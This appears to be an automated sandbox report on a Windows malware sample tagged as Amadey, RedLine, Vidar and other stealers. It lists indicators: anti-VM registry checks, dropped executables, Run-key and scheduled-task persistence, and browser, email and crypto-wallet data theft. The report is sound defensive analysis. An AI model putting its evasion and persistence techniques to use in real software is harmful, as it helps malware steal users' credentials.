Malware Analysis Report

2025-04-03 09:16

Sample ID 250305-b4tfpavpt6
Target 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
SHA256 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
Tags
amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8

Threat Level: Known bad

The file 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8 was found to be: Known bad.

Malicious Activity Summary

amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan

Detect Vidar Stealer

Svcstealer family

Systembc family

RedLine

Vidar family

SvcStealer, Diamotrix

Redline family

Amadey family

Vidar

SystemBC

RedLine payload

Amadey

Detects SvcStealer Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Identifies Wine through registry keys

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Reads user/profile data of web browsers

.NET Reactor protector

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Browser Information Discovery

Unsigned PE

Detects Pyinstaller

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 01:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 01:42

Reported

2025-03-05 01:44

Platform

win10v2004-20250217-en

Max time kernel

95s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cbdaffbfbcdaefbc = "\"C:\\ProgramData\\cbdaffbfbcdaefbc.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856125825006514" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
